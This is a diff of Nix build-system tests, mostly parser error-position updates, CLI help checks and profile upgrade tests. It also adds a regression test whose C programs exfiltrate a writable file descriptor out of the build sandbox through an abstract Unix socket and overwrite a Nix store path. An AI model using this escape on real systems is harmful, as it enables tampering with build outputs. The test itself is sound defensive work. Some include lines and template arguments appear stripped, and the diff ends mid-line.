+nix-env --switch-generation --help
+nix-env --rollback --help
+
+nix-store --help
+nix-store --realise --help
+nix-store --serve --help
+nix-store --gc --help
+nix-store --delete --help
+nix-store --query --help
+nix-store --add --help
+nix-store --add-fixed --help
+nix-store --verify --help
+nix-store --verify-path --help
+nix-store --repair-path --help
+nix-store --dump --help
+nix-store --restore --help
+nix-store --export --help
+nix-store --import --help
+nix-store --optimise --help
+nix-store --read-log --help
+nix-store --dump-db --help
+nix-store --load-db --help
+nix-store --print-env --help
+nix-store --generate-binary-cache-key --help
+
+nix-channel --help
+nix-collect-garbage --help
+nix-copy-closure --help
+nix-daemon --help
+nix-hash --help
+nix-instantiate --help
+nix-prefetch-url --help
+
+function subcommands() {
+ jq -r '
+def recurse($prefix):
+ to_entries[] |
+ ($prefix + [.key]) as $newPrefix |
+ (if .value | has("commands") then
+ ($newPrefix, (.value.commands | recurse($newPrefix)))
+ else
+ $newPrefix
+ end);
+.args.commands | recurse([]) | join(" ")
+'
+}
+
+nix __dump-cli | subcommands | while IFS= read -r cmd; do
+ nix $cmd --help
+done
diff --git a/tests/functional/lang/eval-fail-eol-1.err.exp b/tests/functional/lang/eval-fail-eol-1.err.exp
new file mode 100644
index 000000000..3f5a5c22c
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+ at /pwd/lang/eval-fail-eol-1.nix:2:1:
+ 1| # foo
+ 2| invalid
+ | ^
+ 3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-1.nix b/tests/functional/lang/eval-fail-eol-1.nix
new file mode 100644
index 000000000..476223919
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-1.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-2.err.exp b/tests/functional/lang/eval-fail-eol-2.err.exp
new file mode 100644
index 000000000..ff13e2d55
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+ at /pwd/lang/eval-fail-eol-2.nix:2:1:
+ 1| # foo
+ 2| invalid
+ | ^
+ 3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-2.nix b/tests/functional/lang/eval-fail-eol-2.nix
new file mode 100644
index 000000000..0cf92a425
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-2.nix
@@ -0,0 +1,2 @@
+# foo
invalid
+# bar
diff --git a/tests/functional/lang/eval-fail-eol-3.err.exp b/tests/functional/lang/eval-fail-eol-3.err.exp
new file mode 100644
index 000000000..ada3c5ecd
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.err.exp
@@ -0,0 +1,6 @@
+error: undefined variable 'invalid'
+ at /pwd/lang/eval-fail-eol-3.nix:2:1:
+ 1| # foo
+ 2| invalid
+ | ^
+ 3| # bar
diff --git a/tests/functional/lang/eval-fail-eol-3.nix b/tests/functional/lang/eval-fail-eol-3.nix
new file mode 100644
index 000000000..33422452d
--- /dev/null
+++ b/tests/functional/lang/eval-fail-eol-3.nix
@@ -0,0 +1,3 @@
+# foo
+invalid
+# bar
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.exp b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
new file mode 100644
index 000000000..e87d037c6
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.exp
@@ -0,0 +1 @@
+[ { column = 17; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 19; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 4; } { column = 21; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } { column = 23; file = "/pwd/lang/eval-okay-inherit-attr-pos.nix"; line = 5; } ]
diff --git a/tests/functional/lang/eval-okay-inherit-attr-pos.nix b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
new file mode 100644
index 000000000..017ab1d36
--- /dev/null
+++ b/tests/functional/lang/eval-okay-inherit-attr-pos.nix
@@ -0,0 +1,12 @@
+let
+ d = 0;
+ x = 1;
+ y = { inherit d x; };
+ z = { inherit (y) d x; };
+in
+ [
+ (builtins.unsafeGetAttrPos "d" y)
+ (builtins.unsafeGetAttrPos "x" y)
+ (builtins.unsafeGetAttrPos "d" z)
+ (builtins.unsafeGetAttrPos "x" z)
+ ]
diff --git a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
index 6c3a3510c..ffb5198c1 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-1.err.exp
@@ -3,3 +3,4 @@ error: attribute 'x' already defined at «stdin»:1:3
2| y = 456;
3| x = 789;
| ^
+ 4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
index fecdece20..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-2.err.exp
@@ -1,5 +1,6 @@
error: attribute 'x' already defined at «stdin»:9:5
- at «stdin»:10:17:
+ at «stdin»:10:18:
9| x = 789;
10| inherit (as) x;
- | ^
+ | ^
+ 11| };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
index fecdece20..3105e60de 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-3.err.exp
@@ -1,5 +1,6 @@
error: attribute 'x' already defined at «stdin»:9:5
- at «stdin»:10:17:
+ at «stdin»:10:18:
9| x = 789;
10| inherit (as) x;
- | ^
+ | ^
+ 11| };
diff --git a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
index f85ffea51..c98a8f8d0 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-4.err.exp
@@ -3,3 +3,4 @@ error: attribute 'services.ssh.port' already defined at «stdin»:2:3
2| services.ssh.port = 22;
3| services.ssh.port = 23;
| ^
+ 4| }
diff --git a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
index 98cea9dae..4e0a48eff 100644
--- a/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
+++ b/tests/functional/lang/parse-fail-dup-attrs-7.err.exp
@@ -1,5 +1,6 @@
-error: attribute 'x' already defined at «stdin»:6:12
- at «stdin»:7:12:
+error: attribute 'x' already defined at «stdin»:6:13
+ at «stdin»:7:13:
6| inherit x;
7| inherit x;
- | ^
+ | ^
+ 8| };
diff --git a/tests/functional/lang/parse-fail-eof-in-string.err.exp b/tests/functional/lang/parse-fail-eof-in-string.err.exp
index b28d35950..17f34b62d 100644
--- a/tests/functional/lang/parse-fail-eof-in-string.err.exp
+++ b/tests/functional/lang/parse-fail-eof-in-string.err.exp
@@ -1,5 +1,5 @@
error: syntax error, unexpected end of file, expecting '"'
- at «stdin»:3:5:
+ at «stdin»:3:6:
2| # Note that this file must not end with a newline.
3| a 1"$
- | ^
+ | ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.err.exp b/tests/functional/lang/parse-fail-eof-pos.err.exp
new file mode 100644
index 000000000..ef9ca381c
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.err.exp
@@ -0,0 +1,5 @@
+error: syntax error, unexpected end of file
+ at «stdin»:3:1:
+ 2| # no content
+ 3|
+ | ^
diff --git a/tests/functional/lang/parse-fail-eof-pos.nix b/tests/functional/lang/parse-fail-eof-pos.nix
new file mode 100644
index 000000000..bd66a2c98
--- /dev/null
+++ b/tests/functional/lang/parse-fail-eof-pos.nix
@@ -0,0 +1,2 @@
+(
+# no content
diff --git a/tests/functional/lang/parse-fail-regression-20060610.err.exp b/tests/functional/lang/parse-fail-regression-20060610.err.exp
index d8875a6a5..6ae7c01bf 100644
--- a/tests/functional/lang/parse-fail-regression-20060610.err.exp
+++ b/tests/functional/lang/parse-fail-regression-20060610.err.exp
@@ -1,6 +1,6 @@
error: undefined variable 'gcc'
- at «stdin»:8:12:
- 7|
+ at «stdin»:9:13:
8| body = ({
- | ^
9| inherit gcc;
+ | ^
+ 10| }).gcc;
diff --git a/tests/functional/lang/parse-fail-undef-var-2.err.exp b/tests/functional/lang/parse-fail-undef-var-2.err.exp
index a58d8dca4..393c454dd 100644
--- a/tests/functional/lang/parse-fail-undef-var-2.err.exp
+++ b/tests/functional/lang/parse-fail-undef-var-2.err.exp
@@ -1,5 +1,6 @@
error: syntax error, unexpected ':', expecting '}'
at «stdin»:3:13:
2|
- 3| f = {x, y :
+ 3| f = {x, y : ["baz" "bar" z "bat"]}: x + y;
| ^
+ 4|
diff --git a/tests/functional/lang/parse-fail-utf8.err.exp b/tests/functional/lang/parse-fail-utf8.err.exp
index e83abdb9e..1c83f6eb3 100644
--- a/tests/functional/lang/parse-fail-utf8.err.exp
+++ b/tests/functional/lang/parse-fail-utf8.err.exp
@@ -1,4 +1,5 @@
error: syntax error, unexpected invalid token, expecting end of file
at «stdin»:1:5:
- 1| 123
+ 1| 123 é 4
| ^
+ 2|
diff --git a/tests/functional/lang/parse-okay-subversion.exp b/tests/functional/lang/parse-okay-subversion.exp
index 2303932c4..32fbba3c5 100644
--- a/tests/functional/lang/parse-okay-subversion.exp
+++ b/tests/functional/lang/parse-okay-subversion.exp
@@ -1 +1 @@
-({ fetchurl, localServer ? false, httpServer ? false, sslSupport ? false, pythonBindings ? false, javaSwigBindings ? false, javahlBindings ? false, stdenv, openssl ? null, httpd ? null, db4 ? null, expat, swig ? null, j2sdk ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))
+({ db4 ? null, expat, fetchurl, httpServer ? false, httpd ? null, j2sdk ? null, javaSwigBindings ? false, javahlBindings ? false, localServer ? false, openssl ? null, pythonBindings ? false, sslSupport ? false, stdenv, swig ? null }: assert (expat != null); assert (localServer -> (db4 != null)); assert (httpServer -> ((httpd != null) && ((httpd).expat == expat))); assert (sslSupport -> ((openssl != null) && (httpServer -> ((httpd).openssl == openssl)))); assert (pythonBindings -> ((swig != null) && (swig).pythonSupport)); assert (javaSwigBindings -> ((swig != null) && (swig).javaSupport)); assert (javahlBindings -> (j2sdk != null)); ((stdenv).mkDerivation { inherit expat httpServer javaSwigBindings javahlBindings localServer pythonBindings sslSupport; builder = /foo/bar; db4 = (if localServer then db4 else null); httpd = (if httpServer then httpd else null); j2sdk = (if javaSwigBindings then (swig).j2sdk else (if javahlBindings then j2sdk else null)); name = "subversion-1.1.1"; openssl = (if sslSupport then openssl else null); patches = (if javahlBindings then [ (/javahl.patch) ] else [ ]); python = (if pythonBindings then (swig).python else null); src = (fetchurl { md5 = "a180c3fe91680389c210c99def54d9e0"; url = "http://subversion.tigris.org/tarballs/subversion-1.1.1.tar.bz2"; }); swig = (if (pythonBindings || javaSwigBindings) then swig else null); }))
diff --git a/tests/functional/local.mk b/tests/functional/local.mk
index 18eb887cd..8bb8e3600 100644
--- a/tests/functional/local.mk
+++ b/tests/functional/local.mk
@@ -129,7 +129,8 @@ nix_tests = \
read-only-store.sh \
nested-sandboxing.sh \
impure-env.sh \
- debugger.sh
+ debugger.sh \
+ help.sh
ifeq ($(HAVE_LIBCPUID), 1)
nix_tests += compute-levels.sh
diff --git a/tests/functional/nix-profile.sh b/tests/functional/nix-profile.sh
index ee93251e9..7c4da6283 100644
--- a/tests/functional/nix-profile.sh
+++ b/tests/functional/nix-profile.sh
@@ -74,10 +74,49 @@ nix profile upgrade flake1
[[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello NixOS" ]]
nix profile history | grep "packages.$system.default: 1.0, 1.0-man -> 2.0, 2.0-man"
+# Test upgrading package using regular expression.
+printf 2.1 > $flake1Dir/version
+nix profile upgrade --regex '.*'
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.1/bin/hello ]]
+nix profile rollback
+
+# Test upgrading all packages
+printf 2.2 > $flake1Dir/version
+nix profile upgrade --all
+[[ $(readlink $TEST_HOME/.nix-profile/bin/hello) =~ .*-profile-test-2\.2/bin/hello ]]
+nix profile rollback
+printf 1.0 > $flake1Dir/version
+
+# Test --all exclusivity.
+assertStderr nix --offline profile upgrade --all foo << EOF
+error: --all cannot be used with package names or regular expressions.
+Try 'nix --help' for more information.
+EOF
+
+# Test matching no packages using literal package name.
+assertStderr nix --offline profile upgrade this_package_is_not_installed << EOF
+warning: Package name 'this_package_is_not_installed' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
+# Test matching no packages using regular expression.
+assertStderr nix --offline profile upgrade --regex '.*unknown_package.*' << EOF
+warning: Regex '.*unknown_package.*' does not match any packages in the profile.
+warning: No packages to upgrade. Use 'nix profile list' to see the current profile.
+EOF
+
+# Test removing all packages using regular expression.
+nix profile remove --regex '.*' 2>&1 | grep "removed 2 packages, kept 0 packages"
+nix profile rollback
+
# Test 'history', 'diff-closures'.
nix profile diff-closures
# Test rollback.
+printf World > $flake1Dir/who
+nix profile upgrade flake1
+printf NixOS > $flake1Dir/who
+nix profile upgrade flake1
nix profile rollback
[[ $($TEST_HOME/.nix-profile/bin/hello) = "Hello World" ]]
diff --git a/tests/nixos/ca-fd-leak/default.nix b/tests/nixos/ca-fd-leak/default.nix
new file mode 100644
index 000000000..a6ae72adc
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/default.nix
@@ -0,0 +1,90 @@
+# Nix is a sandboxed build system. But not everything can be handled inside its
+# sandbox: Network access is normally blocked off, but to download sources, a
+# trapdoor has to exist. Nix handles this by having "Fixed-output derivations".
+# The detail here is not important, but in our case it means that the hash of
+# the output has to be known beforehand. And if you know that, you get a few
+# rights: you no longer run inside a special network namespace!
+#
+# Now, Linux has a special feature, that not many other unices do: Abstract
+# unix domain sockets! Not only that, but those are namespaced using the
+# network namespace! That means that we have a way to create sockets that are
+# available in every single fixed-output derivation, and also all processes
+# running on the host machine! Now, this wouldn't be that much of an issue, as,
+# well, the whole idea is that the output is pure, and all processes in the
+# sandbox are killed before finalizing the output. What if we didn't need those
+# processes at all? Unix domain sockets have a semi-known trick: you can pass
+# file descriptors around!
+# This makes it possible to exfiltrate a file-descriptor with write access to
+# $out outside of the sandbox. And that file-descriptor can be used to modify
+# the contents of the store path after it has been registered.
+
+{ config, ... }:
+
+let
+ pkgs = config.nodes.machine.nixpkgs.pkgs;
+
+ # Simple C program that sends a file descriptor to `$out` to a Unix
+ # domain socket.
+ # Compiled statically so that we can easily send it to the VM and use it
+ # inside the build sandbox.
+ sender = pkgs.runCommandWith {
+ name = "sender";
+ stdenv = pkgs.pkgsStatic.stdenv;
+ } ''
+ $CC -static -o $out ${./sender.c}
+ '';
+
+ # Okay, so we have a file descriptor shipped out of the FOD now. But the
+ # Nix store is read-only, right? .. Well, yeah. But this file descriptor
+ # lives in a mount namespace where it is not! So even when this file exists
+ # in the actual Nix store, we're capable of just modifying its contents...
+ smuggler = pkgs.writeCBin "smuggler" (builtins.readFile ./smuggler.c);
+
+ # The abstract socket path used to exfiltrate the file descriptor
+ socketName = "FODSandboxExfiltrationSocket";
+in
+{
+ name = "ca-fd-leak";
+
+ nodes.machine =
+ { config, lib, pkgs, ... }:
+ { virtualisation.writableStore = true;
+ nix.settings.substituters = lib.mkForce [ ];
+ virtualisation.additionalPaths = [ pkgs.busybox-sandbox-shell sender smuggler pkgs.socat ];
+ };
+
+ testScript = { nodes }: ''
+ start_all()
+
+ machine.succeed("echo hello")
+ # Start the smuggler server
+ machine.succeed("${smuggler}/bin/smuggler ${socketName} >&2 &")
+
+ # Build the smuggled derivation.
+ # This will connect to the smuggler server and send it the file descriptor
+ machine.succeed(r"""
+ nix-build -E '
+ builtins.derivation {
+ name = "smuggled";
+ system = builtins.currentSystem;
+ # look ma, no tricks!
+ outputHashMode = "flat";
+ outputHashAlgo = "sha256";
+ outputHash = builtins.hashString "sha256" "hello, world\n";
+ builder = "${pkgs.busybox-sandbox-shell}/bin/sh";
+ args = [ "-c" "echo \"hello, world\" > $out; ''${${sender}} ${socketName}" ];
+ }'
+ """.strip())
+
+
+ # Tell the smuggler server that we're done
+ machine.execute("echo done | ${pkgs.socat}/bin/socat - ABSTRACT-CONNECT:${socketName}")
+
+ # Check that the file was not modified
+ machine.succeed(r"""
+ cat ./result
+ test "$(cat ./result)" = "hello, world"
+ """.strip())
+ '';
+
+}
diff --git a/tests/nixos/ca-fd-leak/sender.c b/tests/nixos/ca-fd-leak/sender.c
new file mode 100644
index 000000000..75e54fc8f
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/sender.c
@@ -0,0 +1,65 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Set up an abstract domain socket path to connect to.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+
+ // Now try to connect. To ensure we work no matter what order we are
+ // executed in, just busyloop here.
+ int res = -1;
+ while (res < 0) {
+ res = connect(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0 && errno != ECONNREFUSED) perror("connect");
+ if (errno != ECONNREFUSED) break;
+ }
+
+ // Write our message header.
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Write an SCM_RIGHTS message containing the output path.
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ hdr->cmsg_len = CMSG_LEN(sizeof(int));
+ hdr->cmsg_level = SOL_SOCKET;
+ hdr->cmsg_type = SCM_RIGHTS;
+ int fd = open(getenv("out"), O_RDWR | O_CREAT, 0640);
+ memcpy(CMSG_DATA(hdr), (void *)&fd, sizeof(int));
+
+ msg.msg_controllen = CMSG_SPACE(sizeof(int));
+
+ // Write a single null byte too.
+ msg.msg_iov = malloc(sizeof(struct iovec));
+ msg.msg_iov[0].iov_base = "";
+ msg.msg_iov[0].iov_len = 1;
+ msg.msg_iovlen = 1;
+
+ // Send it to the other side of this connection.
+ res = sendmsg(sock, &msg, 0);
+ if (res < 0) perror("sendmsg");
+ int buf;
+
+ // Wait for the server to close the socket, implying that it has
+ // received the command.
+ recv(sock, (void *)&buf, sizeof(int), 0);
+}
diff --git a/tests/nixos/ca-fd-leak/smuggler.c b/tests/nixos/ca-fd-leak/smuggler.c
new file mode 100644
index 000000000..82acf37e6
--- /dev/null
+++ b/tests/nixos/ca-fd-leak/smuggler.c
@@ -0,0 +1,66 @@
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+int main(int argc, char **argv) {
+
+ assert(argc == 2);
+
+ int sock = socket(AF_UNIX, SOCK_STREAM, 0);
+
+ // Bind to the socket.
+ struct sockaddr_un data;
+ data.sun_family = AF_UNIX;
+ data.sun_path[0] = 0;
+ strcpy(data.sun_path + 1, argv[1]);
+ int res = bind(sock, (const struct sockaddr *)&data,
+ offsetof(struct sockaddr_un, sun_path)
+ + strlen(argv[1])
+ + 1);
+ if (res < 0) perror("bind");
+
+ res = listen(sock, 1);
+ if (res < 0) perror("listen");
+
+ int smuggling_fd = -1;
+
+ // Accept the connection a first time to receive the file descriptor.
+ fprintf(stderr, "%s\n", "Waiting for the first connection");
+ int a = accept(sock, 0, 0);
+ if (a < 0) perror("accept");
+
+ struct msghdr msg = {0};
+ msg.msg_control = malloc(128);
+ msg.msg_controllen = 128;
+
+ // Receive the file descriptor as sent by the smuggler.
+ recvmsg(a, &msg, 0);
+
+ struct cmsghdr *hdr = CMSG_FIRSTHDR(&msg);
+ while (hdr) {
+ if (hdr->cmsg_level == SOL_SOCKET
+ && hdr->cmsg_type == SCM_RIGHTS) {
+
+ // Grab the copy of the file descriptor.
+ memcpy((void *)&smuggling_fd, CMSG_DATA(hdr), sizeof(int));
+ }
+
+ hdr = CMSG_NXTHDR(&msg, hdr);
+ }
+ fprintf(stderr, "%s\n", "Got the file descriptor. Now waiting for the second connection");
+ close(a);
+
+ // Wait for a second connection, which will tell us that the build is
+ // done
+ a = accept(sock, 0, 0);
+ fprintf(stderr, "%s\n", "Got a second connection, rewriting the file");
+ // Write a new content to the file
+ if (ftruncate(smuggling_fd, 0)) perror("ftruncate");
+ char * new_content = "Pwned\n";
+ int written_bytes = write(smuggling_fd, new_content, strlen(new_content));
+ if (written_bytes != strlen(new_content)) perror("write");
+}
diff --git a/tests/nixos/default.nix b/tests/nixos/default.nix
index 8f4fa2621..98de31e13 100644
--- a/tests/nixos/default.nix
+++ b/tests/nixos/default.nix
@@ -109,7 +109,7 @@ in
nix.package = lib.mkForce pkgs.nixVersions.nix_2_13;
};
};
-
+
# TODO: (nixpkgs update) remoteBuildsSshNg_remote_2_18 = ...
# Test our Nix as a builder for clients that are older
@@ -156,4 +156,6 @@ in
(system: runNixOSTestFor system ./setuid.nix);
fetch-git = runNixOSTestFor "x86_64-linux" ./fetch-git;
+
+ ca-fd-leak = runNixOSTestFor "x86_64-linux" ./ca-fd-leak;
}
diff --git a/tests/nixos/github-flakes.nix b/tests/nixos/github-flakes.nix
index a51689445..6f8a5b9d8 100644
--- a/tests/nixos/github-flakes.nix
+++ b/tests/nixos/github-flakes.nix
@@ -58,7 +58,7 @@ let
mkdir -p $out/{commits,tarball}
# Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
- echo '{"sha": "${private-flake-rev}"}' > $out/commits/HEAD
+ echo '{"sha": "${private-flake-rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
# Setup tarball download via API
dir=private-flake
@@ -72,7 +72,7 @@ let
mkdir -p $out/commits
# Setup https://docs.github.com/en/rest/commits/commits#get-a-commit
- echo '{"sha": "${nixpkgs.rev}"}' > $out/commits/HEAD
+ echo '{"sha": "${nixpkgs.rev}", "commit": {"tree": {"sha": "ffffffffffffffffffffffffffffffffffffffff"}}}' > $out/commits/HEAD
'';
archive = pkgs.runCommand "nixpkgs-flake" {}
diff --git a/tests/unit/libexpr/primops.cc b/tests/unit/libexpr/primops.cc
index 6d7649b3c..b1426edae 100644
--- a/tests/unit/libexpr/primops.cc
+++ b/tests/unit/libexpr/primops.cc
@@ -151,7 +151,7 @@ namespace nix {
}
TEST_F(PrimOpTest, unsafeGetAttrPos) {
- state.corepkgsFS->addFile(CanonPath("foo.nix"), "{ y = \"x\"; }");
+ state.corepkgsFS->addFile(CanonPath("foo.nix"), "\n\r\n\r{ y = \"x\"; }");
auto expr = "builtins.unsafeGetAttrPos \"y\" (import )";
auto v = eval(expr);
@@ -165,10 +165,12 @@ namespace nix {
auto line = v.attrs->find(createSymbol("line"));
ASSERT_NE(line, nullptr);
- ASSERT_THAT(*line->value, IsIntEq(1));
+ state.forceValue(*line->value, noPos);
+ ASSERT_THAT(*line->value, IsIntEq(4));
auto column = v.attrs->find(createSymbol("column"));
ASSERT_NE(column, nullptr);
+ state.forceValue(*column->value, noPos);
ASSERT_THAT(*column->value, IsIntEq(3));
}
diff --git a/tests/unit/libexpr/value/print.cc b/tests/unit/libexpr/value/print.cc
index aabf156c2..d2d699a64 100644
--- a/tests/unit/libexpr/value/print.cc
+++ b/tests/unit/libexpr/value/print.cc
@@ -110,8 +110,8 @@ TEST_F(ValuePrintingTests, vLambda)
.up = nullptr,
.values = { }
};
- PosTable::Origin origin((std::monostate()));
- auto posIdx = state.positions.add(origin, 1, 1);
+ PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+ auto posIdx = state.positions.add(origin, 0);
auto body = ExprInt(0);
auto formals = Formals {};
@@ -558,8 +558,8 @@ TEST_F(ValuePrintingTests, ansiColorsLambda)
.up = nullptr,
.values = { }
};
- PosTable::Origin origin((std::monostate()));
- auto posIdx = state.positions.add(origin, 1, 1);
+ PosTable::Origin origin = state.positions.addOrigin(std::monostate(), 1);
+ auto posIdx = state.positions.add(origin, 0);
auto body = ExprInt(0);
auto formals = Formals {};
diff --git a/tests/unit/libstore/outputs-spec.cc b/tests/unit/libstore/outputs-spec.cc
index 456196be1..63cde681b 100644
--- a/tests/unit/libstore/outputs-spec.cc
+++ b/tests/unit/libstore/outputs-spec.cc
@@ -6,11 +6,9 @@
namespace nix {
-#ifndef NDEBUG
TEST(OutputsSpec, no_empty_names) {
ASSERT_DEATH(OutputsSpec::Names { std::set { } }, "");
}
-#endif
#define TEST_DONT_PARSE(NAME, STR) \
TEST(OutputsSpec, bad_ ## NAME) { \
diff --git a/tests/unit/libutil/data/git/tree.bin b/tests/unit/libutil/data/git/tree.bin
index 5256ec140..4ccd43e9a 100644
Binary files a/tests/unit/libutil/data/git/tree.bin and b/tests/unit/libutil/data/git/tree.bin differ
diff --git a/tests/unit/libutil/data/git/tree.txt b/tests/unit/libutil/data/git/tree.txt
index be3d02920..cd40b6a55 100644
--- a/tests/unit/libutil/data/git/tree.txt
+++ b/tests/unit/libutil/data/git/tree.txt
@@ -1,3 +1,4 @@
100644 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2 Foo
100755 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2 bAr
040000 tree 4b825dc642cb6eb9a060e54bf8d69288fbee4904 baZ
+120000 blob 63ddb340119baf8492d2da53af47e8c7cfcd5eb2 quuX
diff --git a/tests/unit/libutil/git.cc b/tests/unit/libutil/git.cc
index 76ef86bcf..4f92488d6 100644
--- a/tests/unit/libutil/git.cc
+++ b/tests/unit/libutil/git.cc
@@ -67,7 +67,7 @@ TEST_F(GitTest, blob_read) {
StringSink out;
RegularFileSink out2 { out };
ASSERT_EQ(parseObjectType(in, mockXpSettings), ObjectType::Blob);
- parseBlob(out2, "", in, false, mockXpSettings);
+ parseBlob(out2, "", in, BlobMode::Regular, mockXpSettings);
auto expected = readFile(goldenMaster("hello-world.bin"));
@@ -115,6 +115,15 @@ const static Tree tree = {
.hash = Hash::parseAny("4b825dc642cb6eb9a060e54bf8d69288fbee4904", HashAlgorithm::SHA1),
},
},
+ {
+ "quuX",
+ {
+ .mode = Mode::Symlink,
+ // hello world with special chars from above (symlink target
+ // can be anything)
+ .hash = Hash::parseAny("63ddb340119baf8492d2da53af47e8c7cfcd5eb2", HashAlgorithm::SHA1),
+ },
+ },
};
TEST_F(GitTest, tree_read) {
@@ -165,6 +174,12 @@ TEST_F(GitTest, both_roundrip) {
.contents = "good day,\n\0\n\tworld!",
},
},
+ {
+ "quux",
+ File::Symlink {
+ .target = "/over/there",
+ },
+ },
},
},
},
@@ -195,21 +210,24 @@ TEST_F(GitTest, both_roundrip) {
MemorySink sinkFiles2 { files2 };
- std::function mkSinkHook;
- mkSinkHook = [&](auto prefix, auto & hash, auto executable) {
+ std::function] |